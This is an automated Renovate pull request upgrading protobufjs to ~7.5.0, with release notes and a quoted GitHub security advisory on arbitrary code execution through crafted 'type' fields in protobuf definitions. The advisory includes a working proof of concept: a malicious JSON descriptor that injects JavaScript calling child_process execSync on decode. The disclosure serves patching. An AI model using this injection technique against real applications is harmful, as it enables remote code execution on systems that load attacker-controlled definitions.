fix(deps): update dependency protobufjs to ~7.5.0 [security]

[renovate-bot]

This PR contains the following updates:

Package	Change	Age	Confidence
protobufjs (source)	~7.4.0 → ~7.5.0

---

Arbitrary code execution in protobufjs

CVE-2026-41242 / GHSA-xq3m-2v4x-88gg

More information

Details

Summary

protobufjs compiles protobuf definitions into JS functions. Attackers can manipulate these definitions to execute arbitrary JS code.

Details

Attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition.

PoC

const protobuf = require('protobufjs');
maliciousDescriptor = JSON.parse(`{"nested":{"User":{"fields":{"id":{"type":"int32","id":1},"data":{"type":"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X","id":2}}},"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X":{"fields":{"content":{"type":"string","id":1}}}}}`)
const root = protobuf.Root.fromJSON(maliciousDescriptor);
const UserType = root.lookupType("User");
const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);
try {
    const user = UserType.decode(userBytes);
} catch (e) {}

Impact

Remote code execution when attackers can control the protobuf definition files.

Severity

• CVSS Score: 9.4 / 10 (Critical)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

References

• https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-xq3m-2v4x-88gg
• https://nvd.nist.gov/vuln/detail/CVE-2026-41242
• https://github.com/protobufjs/protobuf.js/commit/535df444ac060243722ac5d672db205e5c531d75
• https://github.com/protobufjs/protobuf.js/commit/ff7b2afef8754837cc6dc64c864cd111ab477956
• https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.5.5
• https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.0.1
• https://github.com/advisories/GHSA-xq3m-2v4x-88gg

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

protobufjs/protobuf.js (protobufjs)

v7.5.5: v7.5.5

Compare Source

v7.5.5

This release backports two reported security issues to 7.x branch.

• fix: do not allow setting __proto__ in Message constructor (#​2126)
• fix: filter invalid characters from the type name (#​2127)

Full Changelog: protobufjs/protobuf.js@protobufjs-v7.5.4...protobufjs-v7.5.5

v7.5.4

Compare Source

Bug Fixes

• invalid syntax in descriptor.proto (#​2092) (5a3769a)

v7.5.3

Compare Source

Bug Fixes

• descriptor extensions handling post-editions (#​2075) (6e255d4)

v7.5.2

Compare Source

Bug Fixes

• ensure that types are always resolved (#​2068) (4b51cb2)

v7.5.1

Compare Source

Bug Fixes

• optimize regressions from editions implementations (#​2066) (6406d4c)
• reserved field inside group blocks fail parsing (#​2058) (56782bf)

v7.5.0

Compare Source

Features

• add Edition 2023 Support (f04ded3)
• add Edition 2023 Support (ac9a3b9)
• add Edition 2023 Support (e5ca5c8)
• add Edition 2023 Support (a84409b)
• add Edition 2023 Support (9c5a178)
• add Edition 2023 Support (b2c6867)
• add Edition 2023 Support (60f3e51)
• add Edition 2023 Support (a656361)
• add Edition 2023 Support (869a95b)
• add Edition 2023 Support (b936af4)
• add Edition 2023 Support (a938467)
• add Edition 2023 Support (1af8454)
• add Edition 2023 Support (785416f)
• add feature resolution (a9ffc8a)
• add feature resolution and tests (68b5339)
• add feature resolution for protobuf editions (547afa2)
• add feature resolution for protobuf editions (65d3ed1)
• api_converters_editions tests added and run successfully" (b4b5ca4)
• increase size of file that protobufjs CLI can process (00d5f1a)
• increase size of file that protobufjs CLI can process (d36ef0f)

Bug Fixes

• change tree traversal order and feature resolution algorithm (d2d47d9)
• remove eval usage so that chrome extension MV3 can run properly (#​1941) (f2ccb99)

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.